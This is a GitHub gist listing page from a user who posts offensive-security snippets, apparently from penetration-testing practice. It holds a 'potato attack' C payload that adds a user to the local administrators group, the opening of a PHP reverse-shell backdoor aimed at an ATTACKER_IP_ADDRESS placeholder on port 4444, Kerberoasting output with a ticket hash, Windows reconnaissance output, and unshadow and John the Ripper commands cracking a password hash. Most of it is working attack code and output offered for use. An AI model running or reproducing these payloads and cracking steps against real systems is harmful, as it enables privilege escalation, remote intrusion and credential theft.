Skip to content

Instantly share code, notes, and snippets.

View c0d3x27's full-sized avatar
:octocat:
Working from home

c0d3x27 c0d3x27

:octocat:
Working from home
View GitHub Profile
@c0d3x27
c0d3x27 / test.csproj
Last active June 21, 2023 09:23
keypass
<Project Sdk="Microsoft.NET.Sdk">
<PropertyGroup>
<OutputType>Exe</OutputType>
<TargetFramework>net7.0</TargetFramework>
<ImplicitUsings>enable</ImplicitUsings>
<Nullable>enable</Nullable>
</PropertyGroup>
</Project>
@c0d3x27
c0d3x27 / \main.c
Created June 8, 2023 15:35
potato attack
void DoStuff() {
// Replace all this code by your payload
STARTUPINFO si = { sizeof(STARTUPINFO) };
PROCESS_INFORMATION pi;
CreateProcess(L"c:\\windows\\system32\\cmd.exe",L" /C net localgroup administrators user /add",
NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS, NULL, L"C:\\Windows", &si, &pi);
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
@c0d3x27
c0d3x27 / \storsvc_c.c
Last active June 8, 2023 15:31
potato attack
#if defined(_M_AMD64)
//#define WIN10
//#define WIN11
#define WIN2019
//#define WIN2022
@c0d3x27
c0d3x27 / Invoke-Kerberoasting.ps1
Last active February 25, 2023 20:54
panel control 3
PS C:\Users\webapp\desktop> Invoke-Kerberoast
TicketByteHexStream :
Hash : $krb5tgs$DANTE-DC/SQLService.home.local:60111:300B038D9A7EE3817D464C6668519294$F74FB4903769BCEF2
C04C086C67313A03B9E6E902E99E98C6A13755E5DA536494FC4800C3651311E8B3859DB017F3A2483339F7E377E91B55
742E95E50A3B9A648C3F6D02B8E9AE385EF03A0B3F0662216806CE64C4703BB8CD9679D58F3DAE8A440DA3CACCE0B4B5
880A17C14DA7CEDAB7CA916BABF3912380FB27F6089FD5829545FEE4DB1DBB318D7B8A0F46DECA9CE34B3EC468C96385
33D0C1E947A121F55FC42EDD6BE23DDDE1759697E448CA35555D567A38183D465A39D6735764F435A9DB15ED33B5F5FA
3D4DF52B8996344D024C4F9FCB8D7DE50892B0D1060EB2E99C2FAF2786ED4C14B39C57FB1E3CDC9531FAC258997760DE
@c0d3x27
c0d3x27 / cmd.exe
Last active February 25, 2023 00:21
attack panel
C:\Users\webapp>schtasks /query /fo LIST /v
Folder: \
HostName: CLIENT666
TaskName: \OneDrive Reporting Task-S-1-5-21-1067839273-4045514936-2334618042-1103
Next Run Time: 2/25/2023 2:36:41 PM
Status: Ready
Logon Mode: Interactive only
Last Run Time: 2/24/2023 3:52:53 PM
Last Result: 0
@c0d3x27
c0d3x27 / cmd.exe
Last active February 25, 2023 00:04
panel control 3 cmd
C:\Users\webapp>netsh advfirewall firewall show rule name=all
Rule Name: Windows Web Experience Pack
----------------------------------------------------------------------
Enabled: Yes
Direction: Out
Profiles: Domain,Private,Public
Grouping: Windows Web Experience Pack
LocalIP: Any
RemoteIP: Any
@c0d3x27
c0d3x27 / cmd.exe
Last active February 25, 2023 00:01
panel attack 3
C:\Users\webapp>netsh advfirewall show currentprofile
Domain Profile Settings:
----------------------------------------------------------------------
State ON
Firewall Policy BlockInbound,AllowOutbound
LocalFirewallRules N/A (GPO-store only)
LocalConSecRules N/A (GPO-store only)
InboundUserNotification Enable
RemoteManagement Disable
@c0d3x27
c0d3x27 / mybackdoor.php
Created January 4, 2023 21:01
How To Attack Admin Panels Successfully Part 2
<?php
$ip = 'ATTACKER_IP_ADDRESS';
$port = '4444';
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
set_time_limit (0);
@c0d3x27
c0d3x27 / john wordlist.txt
Created September 27, 2022 17:47
how to attack a web panel
kali@kali:~$ john --rules --wordlist=/tmp/worlist.txt unshadowed.txt
Using default input encoding: UTF-8
Loaded 1 password hash (MD5, crypt(3) $1$ [MD5)
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Doris1995 (victim)
1g 0:00:00:28 DONE (2022-09-27 15:42) 0.03559g/s 2497p/s 2497c/s 2497C/s
@c0d3x27
c0d3x27 / unshadow.txt
Created September 27, 2022 17:36
how to attack admin panels
kali@kali:~$ unshadow passwd-file.txt shadow-file.txt
victim:$1$fOS.xfbT$5c5vh3Zrk.88SbCWP1nrjgccgYvCC/x7SEcjSujtrvQfkO4pSWHaGxZojNy.vAqMGrBBNOb0P3pW1ybxm2OIT/:1003:1003:,,,:/home/victim:/bin/bash
kali@kali:~$ unshadow passwd.txt shadow.txt > unshadowed.txt